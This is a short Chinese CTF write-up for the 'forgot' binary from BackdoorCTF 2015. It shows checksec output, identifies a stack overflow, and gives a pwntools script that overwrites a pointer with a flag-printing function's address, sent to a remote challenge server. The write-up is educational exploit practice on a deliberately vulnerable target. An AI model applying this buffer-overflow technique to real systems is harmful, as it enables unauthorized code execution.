美文网首页
攻防世界 forgot wp (backdoorctf-2015

攻防世界 forgot wp (backdoorctf-2015

作者: 111p1kk | 来源:发表于2019-08-02 23:55 被阅读0次

checksec

kk@ubuntu:~/Desktop/black/GFSJ/forgot$ checksec forgot 
[*] '/home/kk/Desktop/black/GFSJ/forgot/forgot'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

ida
栈溢出


又找到了这个函数可以直接 cat flag

EXP如下

#!usr/bin/python

from pwn import *

io = remote("111.198.29.45", 54796)
# io = process("./forgot")
flag_addr = 0x080486CC

io.recv()
io.sendline("kk")

io.recv()
payload = "a" * 32 + "a" * 4 + p32(flag_addr)
io.sendline(payload)

io.interactive()

相关文章

网友评论

      本文标题:攻防世界 forgot wp (backdoorctf-2015

      本文链接:https://www.haomeiwen.com/subject/aekddctx.html